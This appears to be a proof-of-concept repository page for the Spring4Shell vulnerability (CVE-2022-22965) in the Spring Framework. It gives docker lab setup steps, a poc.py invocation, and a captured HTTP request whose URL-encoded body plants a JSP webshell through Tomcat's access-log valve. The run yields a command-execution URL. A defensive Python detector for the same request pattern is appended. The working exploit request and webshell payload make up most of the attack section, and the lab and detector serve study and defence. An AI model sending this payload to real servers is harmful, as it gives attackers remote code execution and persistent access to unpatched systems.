PoC details: 2768d9ada22730c3ac3824366ff3c16585f74133

Source
Related vulnerability
Title: Spring Framework code injection vulnerability (CVE-2022-22965)
Description: Spring Framework is an open-source Java/JavaEE application framework from the Spring team (US). The framework helps developers build high-quality applications. Spring Framework contains a code injection vulnerability that stems from RCE via data binding on JDK 9+. The following products and versions are affected: 5.3.0 to 5.3.17, 5.2.0 to 5.2.19; older, unsupported versions are also affected.
Description
Spring4Shell - CVE-2022-22965
Introduction
# Spring4Shell - CVE-2022-22965

## Build
- clone the repository, then build and run the container

```bash
$ git clone https://github.com/twseptian/cve-2022-22965.git
$ cd cve-2022-22965
$ docker build . -t spring4shell-poc
$ docker run -p 8080:8080 --name spring4shell-poc spring4shell-poc
```
- check access in a browser at `http://172.17.0.2:8080/spring-form/greeting`

![docker run](screenshots/docker_run.png)

## PoC
- add a proxy in `poc.py` so the request can be inspected:
```python
[SNIP]
proxies = {'http':'http://127.0.0.1:8081','https':'https://127.0.0.1:8081'} # proxy configuration
[SNIP]
...
[SNIP]
        try:
            requests.post(self.url,
                          headers=headers,
                          data=data,
                          timeout=15,
                          allow_redirects=False,
                          verify=False, proxies=proxies)
[SNIP]
```

- run `poc.py` with the following command:
```bash
$ python3 poc.py --url http://172.17.0.2:8080/spring-form/greeting
Vulnerable,shell url: http://172.17.0.2:8080/tomcatwar.jsp?pwd=j&cmd=whoami
```

![python poc](screenshots/poc.png)

**NOTE**: Thanks to [Spring4Shell PoC Application](https://github.com/reznok/Spring4Shell-POC) for the Python exploit

- while the exploit generates the shell URL, the POST request can be intercepted with Burp Suite

```http
POST /spring-form/greeting HTTP/1.1
Host: 172.17.0.2:8080
User-Agent: python-requests/2.23.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
suffix: %>//
c1: Runtime
c2: <%
DNT: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 762

class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=
```

**NOTE**: you can analyze the request by yourself #lul

- the exploit generates the shell URL; opening it in the browser gives remote code execution on the target.

![shell url](screenshots/shell_url.png)

![shell url](screenshots/shell_url2.png)
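The captured request above is the artefact a defender cares about: every parameter name walks `class.module.classLoader` down into Tomcat's AccessLogValve, and the `%{c1}i`, `%{c2}i` and `%{suffix}i` lookups inside the pattern pull the custom request headers into the written file. The following detector is an added example, not part of this repository or the upstream PoC; it takes a raw HTTP request as text, mirrors the `class.*` / `Class.*` disallowed-field rule from Spring's advisory, and reports which valve fields and headers a request touches.

```python
import re
from urllib.parse import parse_qsl

# Spring's advisory mitigation: disallow binder fields matching class.*, Class.*, *.class.*, *.Class.* (same rule as a regex).
CLASS_FIELD_RE = re.compile(r"(^|\.)class\.", re.IGNORECASE)
# Tomcat AccessLogValve fields that the captured request sets via the classLoader chain.
VALVE_FIELDS = {"pattern", "suffix", "directory", "prefix", "fileDateFormat"}
HEADER_REF_RE = re.compile(r"%\{([^}]+)\}i")  # AccessLogValve "%{name}i" header lookup

def parse_raw_request(raw):
    # Split a raw HTTP request into (request line, lower-cased header dict, body).
    head, _, body = raw.partition("\n\n")
    lines = head.splitlines()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body.strip()

def detect_spring4shell(raw):
    """Flag form fields that reach class.module.classLoader and the headers they reference."""
    _, headers, body = parse_raw_request(raw)
    params = parse_qsl(body, keep_blank_values=True)  # percent-decodes names and values
    binder_fields = [n for n, _ in params if CLASS_FIELD_RE.search(n)]
    valve_fields = sorted({n.rsplit(".", 1)[-1] for n in binder_fields
                           if ".pipeline.first." in n and n.rsplit(".", 1)[-1] in VALVE_FIELDS})
    refs = set()
    for n, v in params:
        if n in binder_fields:
            refs.update(HEADER_REF_RE.findall(v))
    return {
        "suspicious": bool(binder_fields),
        "binder_fields": binder_fields,
        "valve_fields": valve_fields,
        "header_refs": sorted(h for h in refs if h.lower() in headers),
    }

# Constructed sample: the captured request above with the pattern value cut down
# to its three header references, plus a benign form post for comparison.
CAPTURED = (
    "POST /spring-form/greeting HTTP/1.1\nHost: 172.17.0.2:8080\n"
    "suffix: %>//\nc1: Runtime\nc2: <%\nContent-Type: application/x-www-form-urlencoded\n\n"
    "class.module.classLoader.resources.context.parent.pipeline.first.pattern="
    "%25%7Bc2%7Di%20%25%7Bc1%7Di%20%25%7Bsuffix%7Di"
    "&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp"
    "&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT"
    "&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar"
    "&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
)
BENIGN = "POST /spring-form/greeting HTTP/1.1\nHost: 172.17.0.2:8080\n\nname=alice&greeting=hi"
```

`detect_spring4shell(CAPTURED)` reports all five valve fields and the three referenced headers, while the benign post is not flagged; the same `CLASS_FIELD_RE` check is what a `WebDataBinder.setDisallowedFields` rule enforces server-side.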

## References
- [Spring4Shell PoC Application](https://github.com/reznok/Spring4Shell-POC)
- [Spring4Shell-POC (CVE-2022-22965)](https://github.com/BobTheShoplifter/Spring4Shell-POC)
File snapshot

[4.0K] /data/pocs/2768d9ada22730c3ac3824366ff3c16585f74133
├── [4.0K] app
│   └── [ 18M] spring-form.war
├── [ 145] Dockerfile
├── [3.7K] poc.py
├── [2.8K] README.md
└── [4.0K] screenshots
    ├── [ 70K] docker_run.png
    ├── [ 11K] poc.png
    ├── [307K] shell_url2.png
    └── [ 93K] shell_url.png

2 directories, 8 files